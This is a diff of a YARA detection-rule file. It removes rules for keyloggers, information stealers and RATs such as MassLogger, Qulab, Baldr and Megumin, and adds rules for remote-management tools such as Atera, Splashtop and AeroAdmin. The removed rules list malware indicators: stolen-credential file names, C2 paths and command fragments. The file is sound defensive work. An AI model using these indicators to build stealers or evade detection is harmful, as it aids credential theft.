+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "DigiCert, Inc." and pe.signatures [ i ] . subject contains "PDQ.com Corporation" )
 }
-rule DITEKSHEN_MALWARE_Win_Masslogger : FILE
+rule DITEKSHEN_INDICATOR_RMM_Pulseway_Pcmontasksrv : FILE
 {
 	meta:
-		description = "MassLogger keylogger payload"
+		description = "Detects Pulseway pcmontask and service user agent responsible for Remote Control, Screens View, Computer Lock, etc"
 		author = "ditekSHen"
-		id = "9181b89a-2ce8-59b6-9703-c01a8471b8d6"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L905-L934"
+		id = "83901679-ffff-5710-b472-ece592e6764f"
+		date = "2024-10-04"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L245-L266"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7d8bbefa71a1eb20cd9d029bd516d6c37e39cfa053ed0617eace200d210d9b58"
+		logic_hash = "80ba217960dd1ddeb220545c1cccbe96d9b676d327364e1ca8a9dde2b059261f"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
+		clamav1 = "INDICATOR.Win.RMM.PulseWay"
 
 	strings:
-		$s1 = "MassLogger v" ascii wide
-		$s2 = "MassLogger Started:" ascii wide
-		$s3 = "MassLogger Process:" ascii wide
-		$s4 = "/panel/upload.php" wide
-		$s5 = "ftp://" wide
-		$s6 = "\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}" fullword wide
-		$s7 = "^(.*/)?([^/\\\\.]+/\\\\.\\\\./)(.+)$" fullword wide
-		$s8 = "Bot Killer" ascii
-		$s9 = "Keylogger And Clipboard" ascii
-		$c1 = "costura.ionic.zip.reduced.dll.compressed" fullword ascii
-		$c2 = "CHECKvUNIQUEq" fullword ascii
-		$c3 = "HOOK/MEMORY6" fullword ascii
-		$c4 = "Massfile" ascii wide
-		$c5 = "Fz=[0-9]*'skips*" fullword ascii
-		$c6 = ":=65535zO" fullword ascii
-		$c7 = "!$!%!&!'!(!)!*!.!/!0!4!" fullword ascii
-		$c8 = "5!9!:!<!>!@!E!G!J!K!L!N!O!P!`!" fullword ascii
-		$c9 = "dllToLoad" fullword ascii
-		$c10 = "set_CreateNoWindow" fullword ascii
-		$c11 = "FtpWebRequest" fullword ascii
-		$c12 = "encryptedUsername" fullword ascii
-		$c13 = "encryptedPassword" fullword ascii
+		$s1 = "MM.Monitor." ascii
+		$s2 = "RDAgentSessionSettingsV" ascii
+		$s3 = "CheckForMacOSRemoteDesktopUpdateCompletedEvent" ascii
+		$s4 = "ConfirmAgentStarted" ascii
+		$s5 = "GetScreenshot" ascii
+		$s6 = "UnloadRemoteDesktopDlls" ascii
+		$s7 = "CtrlAltDeleteProc" ascii
+		$s8 = "$7cfc3b88-6dc4-49fc-9f0a-bf9e9113a14d" ascii
+		$s9 = "computermonitor.mmsoft.ro" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and 9 of ( $c* ) ) or ( 5 of ( $s* ) or 9 of ( $c* ) )
+		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0xcfd0 ) and 7 of them
 }
-rule DITEKSHEN_MALWARE_Win_Echelon : FILE
+rule DITEKSHEN_INDICATOR_RMM_Pulseway_Remotedesktop : FILE
 {
 	meta:
-		description = "Echelon information stealer payload"
+		description = "Detects Pulseway Rempte Desktop client"
 		author = "ditekSHen"
-		id = "e13d2003-c755-5dd3-bb16-8e41dd19a151"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L936-L957"
+		id = "8bca3cef-b24f-597a-a6e2-86040ed726f4"
+		date = "2024-10-04"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L268-L286"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c070bf52cc51dd334ea24614e33eaa2b7b1a17e7790e586cbbb8c7e33ba1bd76"
+		logic_hash = "a542c11f21ab48f4da69df4e7cb46531658a714687e2c2f8ccf78dc2a0338b68"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		clamav1 = "INDICATOR.Win.RMM.PulseWay"
 
 	strings:
-		$s1 = "<GetStealer>b__" ascii
-		$s2 = "clearMac" fullword ascii
-		$s3 = "path2save" fullword ascii
-		$s4 = "Echelon_Size" fullword ascii
-		$s5 = "Echelon Stealer by" wide
-		$s6 = "get__masterPassword" fullword ascii
-		$s7 = "DomainDetect" fullword ascii
-		$s8 = "[^\\u0020-\\u007F]" fullword wide
-		$s9 = "/sendDocument?chat_id=" wide
-		$s10 = "//setting[@name='Password']/value" wide
-		$s11 = "Passwords_Mozilla.txt" fullword wide
-		$s12 = "Passwords_Edge.txt" fullword wide
-		$s13 = "@madcod" ascii wide
-		$pdb = "\\Echelon-Stealer-master\\obj\\Release\\Echelon.pdb" ascii
+		$s1 = "RemoteControl" ascii
+		$s2 = "MM.Monitor.RemoteDesktopClient." ascii
+		$s3 = "MM.Monitor.RemoteControl" ascii
+		$s4 = "RemoteDesktopClientUpdateInfo" ascii
+		$s5 = "ShowRemoteDesktopEnabledSystemsOnly" ascii
+		$s6 = "$31f50968-d45c-49d6-ace9-ebc790855a51" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and ( 8 of ( $s* ) or $pdb ) ) or ( 8 of ( $s* ) or $pdb )
+		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0xcfd0 ) and 5 of them
 }
-rule DITEKSHEN_MALWARE_Win_Qulab
+
+rule DITEKSHEN_INDICATOR_RMM_Pulseway_CERT : FILE
 {
 	meta:
-		description = "Qulab information stealer payload or artifacts"
+		description = "Detects PulseWay by (default) certificate. Review RMM Inventory"
 		author = "ditekSHen"
-		id = "6ae24c67-5700-5330-a3bd-d542162faebb"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L959-L983"
+		id = "e00f51dc-261e-5a38-89ed-1899d9b522d4"
+		date = "2024-10-04"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L288-L302"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "659d828cbef38c6362b612be9bdc05ae820f49c23684e77af6462ea677133284"
+		logic_hash = "c667caa9b7de4b166630c66e5162071948fa93c68b1cdb3038fce28e13dcb1a9"
 		score = 75
 		quality = 75
-		tags = ""
-		clamav_sig = "MALWARE.Win.Trojan.QulabZ-Stealer"
-
-	strings:
-		$x1 = "QULAB CLIPPER + STEALER" ascii wide
-		$x2 = "MASAD CLIPPER + STEALER" ascii wide
-		$x3 = "http://teleg.run/Qulab" ascii wide
-		$x4 = "http://teleg.run/jew_seller" ascii wide
-		$x5 = "BUY CLIPPER + STEALER" ascii wide
-		$s1 = "\\Screen.jpg" ascii wide
-		$s2 = "attrib +s +h \"" ascii wide
-		$s3 = "\\x86_microsoft-windows-" ascii wide
-		$s4 = "\\amd64_microsoft-windows-" ascii wide
-		$s5 = "Desktop TXT File" ascii wide
-		$s6 = "\\AutoFills.txt" ascii wide
-		$s7 = "\\CreditCards.txt" ascii wide
-		$s8 = "a -y -mx9 -ssw" ascii wide
-		$s9 = "\\Passwords.txt" ascii wide
-		$s10 = "\\Information.txt" ascii wide
-		$s11 = "\\getMe" ascii wide
+		tags = "FILE"
 
 	condition:
-		9 of them or ( ( 1 of ( $x* ) and 4 of ( $s* ) ) or 1 of ( $x* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "DigiCert, Inc." and pe.signatures [ i ] . subject contains "MMSOFT Design Ltd." )
 }
-rule DITEKSHEN_MALWARE_Win_Orion : FILE
+rule DITEKSHEN_INDICATOR_RMM_Manageengine_Zohomeeting : FILE
 {
 	meta:
-		description = "Orion Keylogger payload"
+		description = "Detects ManageEngine Zoho Meeting (dc_rds.exe)"
 		author = "ditekSHen"
-		id = "b380b93b-6ceb-5244-aeca-b1f8f9a5b553"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L985-L1005"
+		id = "b15efdd1-323c-5ed6-894d-b44f04d2eaf3"
+		date = "2024-10-04"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L304-L324"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9e5521ebaf9bdef6dadd2a2a093bd6f87ded023d9a74db126ac8ec9a5f1f9744"
+		logic_hash = "8066bcd17245efcc73f2bef7f022ad23ab648fe0ad15ca66c0d387ce4eda998b"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
+		clamav1 = "INDICATOR.Win.RMM.ManageEngine-ZohoMeeting"
 
 	strings:
-		$s1 = "\\Ranger.BrowserLogging" ascii wide nocase
-		$s2 = "GrabAccounts" fullword ascii
-		$s3 = "DownloadFile" fullword ascii
-		$s4 = "Internet Explorer Recovery" wide
-		$s5 = "Outlook Recovery" wide
-		$s6 = "Thunderbird Recovery" wide
-		$s7 = "Keylogs -" wide
-		$s8 = "WebCam_Capture.dll" wide
-		$s9 = " is not installed on this computer!" wide
-		$s10 = "cmd /c bfsvc.exe \"" wide
-		$s11 = "/Keylogs - PC:" fullword wide
-		$s12 = "/PC:" fullword wide
-		$s13 = "<p style=\"color:#CC7A00\">[" wide
+		$s1 = "bin\\ClientAuthHandler.dll" wide
+		$s2 = "AgentHook.dll" wide
+		$s3 = "UEMS - Remote Control" wide
+		$s4 = "Install hook...." wide
+		$s5 = "india.adventnet.com/meet.sas?k=" ascii
+		$s6 = "dcTcpSocket::" ascii
+		$s7 = "%s/%s?clientId=%s&sessionId=%s&clientName=%s&ticket=%s&connectionId=%s" ascii
+		$s8 = ".\\engines\\ccgost\\gost_" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and 5 of ( $s* ) ) or ( 6 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-rule DITEKSHEN_MALWARE_Win_Aspire : FILE
+rule DITEKSHEN_INDICATOR_RMM_Atera : FILE
 {
 	meta:
-		description = "Aspire Keylogger payload"
+		description = "Detects Atera. Review RMM Inventory"
 		author = "ditekSHen"
-		id = "25724975-f373-553e-b27e-43168e956c16"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1007-L1022"
+		id = "9801f5c9-bc1e-5502-8bca-ee1f5ca0f497"
+		date = "2024-10-04"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L345-L366"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3ea0136dbacb79e4c7556f562d17b26b84ac3e4c967b117021e2399ded0a0fdf"
+		logic_hash = "dbc37a941b38d36ea9bc31880c3cba6cd2b88b534583e86741f7686fcb410235"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
+		clamav1 = "INDICATOR.Win.RMM.Atera"
 
 	strings:
-		$s1 = "AspireLogger -" wide
-		$s2 = "Application: @" wide
-		$s3 = "encryptedUsername" wide
-		$s4 = "encryptedPassword" wide
-		$s5 = "Fetch users fron logins" wide
-		$s6 = "URI=file:" wide
-		$s7 = "signons.sqlite" wide
-		$s8 = "logins.json" wide
+		$s1 = "SOFTWARE\\ATERA Networks\\AlphaAgent" wide
+		$s2 = "Monitoring & Management Agent by ATERA" ascii wide
+		$s3 = "agent-api-{0}.atera.com" wide
+		$s4 = "agent-api.atera.com" wide
+		$s5 = "acontrol.atera.com" wide
+		$s6 = /Agent\/(PingReply|GetCommandsFallback|GetCommands|GetTime|GetEnvironmentStatus|GetRecurringPackages|AgentStarting|AcknowledgeCommands)/ wide
+		$s7 = "\\AlphaControlAgent\\obj\\Release\\AteraAgent.pdb" ascii
+		$s8 = "AteraWebAddress" ascii
+		$s9 = "AlphaControlAgent.CloudLogsManager+<>" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and 6 of ( $s* ) ) or ( 7 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-rule DITEKSHEN_MALWARE_Win_S05Kitty : FILE
+
+rule DITEKSHEN_INDICATOR_RMM_Atera_CERT : FILE
 {
 	meta:
-		description = "Sector05 Kitty RAT payload"
+		description = "Detects Atera by certificate. Review RMM Inventory"
 		author = "ditekSHen"
-		id = "3261f6b6-21e7-5195-98db-9607ba530572"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1024-L1045"
+		id = "a5ccb684-1e28-51c8-a4d6-0b5abba97de0"
+		date = "2024-10-04"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L368-L383"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "df2930694671c9ca16f2afeb799704647c9acf32be118706c342347ffe8ceb36"
+		logic_hash = "f51fef767cd529271f06d578146634e1ab5ee5ac3ffb829cbaa870e7c69ca3f6"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Execute Comand" ascii
-		$s2 = "InjectExplorer" ascii
-		$s3 = "targetProcess = %s" fullword ascii
-		$s4 = "Process attach (%s)" fullword ascii
-		$s5 = "process name: %s" fullword ascii
-		$s6 = "cmd /c %s >%s" fullword ascii
-		$s7 = "CmdDown: %s, failed" fullword ascii
-		$s8 = "http://%s%s/%s" fullword ascii
-		$s9 = "tmp.LOG" fullword ascii
-		$x1 = "zerodll.dll" fullword ascii
-		$x2 = "OneDll.dll" fullword ascii
-		$x3 = "kkd.bat" fullword ascii
-		$x4 = "%s\\regsvr32.exe /s \"%s\"" fullword ascii
-		$x5 = "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\fontchk.jse" fullword ascii
+		clamav1 = "INDICATOR.Win.RMM.Atera"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 8 of ( $s* ) or all of ( $x* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "DigiCert" and pe.signatures [ i ] . subject contains "Atera Networks Ltd" )
 }
-rule DITEKSHEN_MALWARE_Win_Fakewmi : FILE
+rule DITEKSHEN_INDICATOR_RMM_Splashtopstreamer : FILE
 {
 	meta:
-		description = "FakeWMI payload"
+		description = "Detects Splashtop Streamer. Review RMM Inventory"
 		author = "ditekSHen"
-		id = "689bc207-2bc6-50de-80d6-d1ba0a26b264"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1047-L1064"
+		id = "317f2be4-983f-5528-b629-75a13de7b411"
+		date = "2024-10-04"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L385-L403"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "627886cdd01f5f02e454ef284c77c87eb027ee33f6a51536758fb7f095271a40"
+		logic_hash = "67181cd6ae071074c6bf35f44963c11c9ee9b7df242027c15b1e165d108f7b98"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.Fakewmi"
+		clamav1 = "INDICATOR.Win.RMM.SplashtopStreamer"
 
 	strings:
-		$s1 = "-BEGIN RSA PUBLIC KEY-" ascii
-		$s2 = ".exe|" ascii
-		$s3 = "cmd /c wmic " ascii
-		$s4 = "cmd /c sc " ascii
-		$s5 = "schtasks" ascii
-		$s6 = "taskkill" ascii
-		$s7 = "findstr" ascii
-		$s8 = "netsh interface" ascii
-		$s9 = "CreateService" ascii
+		$s1 = "\\slave\\workspace\\GIT_WIN_SRS_Formal\\Source\\irisserver\\" ascii
+		$s2 = ".api.splashtop.com" wide
+		$s3 = "Software\\Splashtop Inc.\\Splashtop" wide
+		$s4 = "restarted the streamer.%nApp version: %1" wide
+		$s5 = "Splashtop-Splashtop Streamer-" wide
+		$s6 = "[RemoveStreamer] Send msg 2 cloud(%d:%d:%d)" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) and #s2 > 10 )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-rule DITEKSHEN_MALWARE_Win_Baldr : FILE
+
+rule DITEKSHEN_INDICATOR_RMM_Splashtopstreamer_CERT : FILE
 {
 	meta:
-		description = "Baldr payload"
+		description = "Detects Splashtop Streamer by certificate. Review RMM Inventory"
 		author = "ditekSHen"
-		id = "cdc35a11-a97b-5e21-929e-01fed5172b55"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1066-L1083"
+		id = "7e0e4d6f-38a3-5cac-8a82-8aea7943d373"
+		date = "2024-10-04"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L405-L419"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f8e97fd618209bc6ce609b60b1e1f1e359be7678474fad3b18a529487c64cd99"
+		logic_hash = "0a1225a79ff30678846b9cb4315419be04b46276b3e05310a21d088b30f01b72"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.Baldr"
-
-	strings:
-		$x1 = "BALDR VERSION : {0}" fullword wide
-		$x2 = "Baldr" fullword ascii wide
-		$x3 = "{0}\\{1:n}.exe" fullword wide
-		$x4 = ".doc;.docx;.log;.txt;" fullword wide
-		$s1 = "<GetMAC>b__" ascii
-		$s2 = "<ExtractPrivateKey3>b__" ascii
-		$s3 = "UploadData" fullword ascii
-		$s6 = "get_NetworkInterfaceType" fullword ascii
-		$s5 = "get_Passwordcheck" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and all of ( $x* ) ) or ( 2 of ( $x* ) and 4 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "DigiCert" and pe.signatures [ i ] . subject contains "Splashtop Inc." )
 }
-rule DITEKSHEN_MALWARE_Win_Megumin : FILE
+rule DITEKSHEN_INDICATOR_RMM_Aeroadmin : FILE
 {
 	meta:
-		description = "Megumin payload"
+		description = "Detects AeroAdmin. Review RMM Inventory"
 		author = "ditekSHen"
-		id = "bb1743f7-0bd8-5c0a-ad78-c4747904204f"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1085-L1108"
+		id = "0f69c6da-40e4-5952-b6f9-ed401279eb9e"
+		date = "2024-10-04"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L421-L442"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "fb4934814c45d2465b6e1589c3b489116343ca0c17ebb916b5c9247fc676c74d"
+		logic_hash = "a0a9e15f31b6b06fbc749b863563c30351c775c1b1d17952013670e7e1d68c41"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.Megumin"
+		clamav1 = "INDICATOR.Win.RMM.AeroAdmin"
 
 	strings:
-		$s1 = "loadpe|" fullword ascii
-		$s2 = "Megumin/2.0" fullword ascii
-		$s3 = "/c start /I \"\" \"" fullword ascii
-		$s4 = "jsbypass|" fullword ascii
-		$cnc1 = "Mozilla/5.0 (Windows NT 6.1) Megumin/2.0" fullword ascii
-		$cnc2 = "/cdn-cgi/l/chk_jschl?s=" fullword ascii
-		$cnc3 = "/newclip?hwid=" fullword ascii
-		$cnc4 = "/isClipper" fullword ascii
-		$cnc5 = "/task?hwid=" fullword ascii
-		$cnc6 = "/completed?hwid=" fullword ascii
-		$cnc7 = "/gate?hwid=" fullword ascii
-		$cnc8 = "/addbot?hwid=" fullword ascii
-		$pdb = "\\MeguminV2\\Release\\MeguminV2.pdb" ascii
+		$s1 = "\\AeroAdmin" wide
+		$s2 = ".aeroadmin.com" ascii wide
+		$s3 = "XAeroadminAppRestarter" wide
+		$s4 = "SYSTEM\\ControlSet001\\Control\\SafeBoot\\Network\\AeroadminService" wide
+		$s5 = "AeroAdmin {}" ascii
+		$s6 = "FAeroAdmin.cpp" fullword ascii
+		$s7 = "Referer: http://900100.net" ascii
+		$s8 = "POST /sims/sims_new.php" ascii
+		$s9 = "aeroadmin.pdb" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or 5 of ( $cnc* ) or $pdb ) ) or 11 of them
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-rule DITEKSHEN_MALWARE_Win_Rietspoof : FILE
+
+rule DITEKSHEN_INDICATOR_RMM_Aeroadmin_CERT : FILE
 {
 	meta:
-		description = "Rietspoof payload"
+		description = "Detects AeroAdmin by certificate. Review RMM Inventory"
 		author = "ditekSHen"
-		id = "b2d94705-ca59-56ae-8471-2c6895d355dc"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1110-L1140"
+		id = "ca34fd3c-eb76-57e3-8b62-ab0d0c9ec7b3"
+		date = "2024-10-04"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L444-L461"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d1d9baab83c904d1e8dcd7aeacdabfc79c1acee67006793c2240a42ebf9c62b2"
+		logic_hash = "f1fe2d2bb6a8afd25fc5ee7a60fe5a931484591bafab24c5d488c7f0483e248a"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.Rietspoof"
-
-	strings:
-		$c1 = "%s%s%s USER: user" fullword ascii
-		$c2 = "cmd /c %s" fullword ascii
-		$c3 = "CreateObject(\"Scripting.FileSystemObject\").DeleteFile(" ascii
-		$c4 = "WScript.Quit" fullword ascii
-		$c5 = "CPU: %s(%d)" fullword ascii
-		$c6 = "RAM: %lld Mb" fullword ascii
-		$c7 = "data.dat" fullword ascii
-		$c8 = "%s%s%s USER:" ascii
-		$v1_1 = ".vbs" ascii
-		$v1_2 = "HELLO" ascii
-		$v1_3 = "Wscript.Sleep" ascii
-		$v1_4 = "User-agent:Mozilla/5.0 (Windows; U;" ascii
-		$v2_1 = "Xjoepxt!" ascii
-		$v2_2 = "Content-MD5:%s" fullword ascii
-		$v2_3 = "M9h5an8f8zTjnyTwQVh6hYBdYsMqHiAz" fullword ascii
-		$v2_4 = "GET /%s?%s HTTP/1.1" fullword ascii
-		$v2_5 = "GET /?%s HTTP/1.1" fullword ascii
-		$pdb1 = "\\techloader\\loader\\loader.odb" ascii wide
-		$pdb2 = "\\loader\\Release\\loader_v1.0.pdb" ascii wide
+		clamav1 = "INDICATOR.Win.RMM.AeroAdmin"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 7 of ( $c* ) and ( 3 of ( $v* ) or 1 of ( $pdb* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "GlobalSign" and ( pe.signatures [ i ] . subject contains "Aeroadmin LLC" or pe.signatures [ i ] . subject contains "@aeroadmin.com" ) )
 }
-rule DITEKSHEN_MALWARE_Win_Modirat : FILE
+rule DITEKSHEN_INDICATOR_RMM_Dwagentlib : FILE
 {
 	meta:
-		description = "MoDiRAT payload"
+		description = "Detect DWAgent Remote Administration Tool library"
 		author = "ditekSHen"
-		id = "8b641c7a-5ebd-50e7-83cb-e408683c456b"
-		date = "2024-11-01"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1142-L1158"
+		id = "af0f9940-fbec-5775-9b74-bd73b55ec0ca"
+		date = "2024-10-04"
+		modified = "2024-10-04"
+		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L463-L482"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d0760e9dab7e9c0affb2193ea249feea8bb58e519522ca2a562f015059ad5590"
+		logic_hash = "608dd9bc8cfcec5a671bee9456dccedace31d7ae37180387ac2408f79fd9f452"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		clamav1 = "INDICATOR.Win.RMM.DWAgent-LIB"
 
 	strings:
-		$s1 = "add_Connected" fullword ascii
-		$s2 = "Statconnected" fullword ascii
-		$s3 = "StartConnect" fullword ascii
-		$s4 = "TelegramTitleDetect" fullword ascii
-		$s5 = "StartTitleTelegram" fullword ascii
-		$s6 = "Check_titles" fullword ascii
-		$s7 = "\\MoDi RAT V" ascii
-		$s8 = "IsBuzy" fullword ascii
-		$s9 = "Recording_Time" fullword wide
+		$s1 = "DWAgentLib" fullword wide
+		$s2 = "PYTHONHOME" fullword wide
+		$s3 = "isTaskRunning" fullword ascii
+		$s4 = "isUserInAdminGroup" fullword ascii
+		$s5 = "setFilePermissionEveryone" fullword ascii
+		$s6 = "startProcessInActiveConsole" fullword ascii
+		$s7 = "taskKill" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and 7 of them ) or all of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule DITEKSHEN_MALWARE_DOC_Koadicdoc : FILE
+rule DITEKSHEN_INDICATOR_RMM_Dwagentsvc : FILE
 {
 	meta:
-		description = "Koadic post-exploitation framework document payload"
+		description = "Detect DWAgent Remote Administration Tool service"
 		author = "ditekSHen"
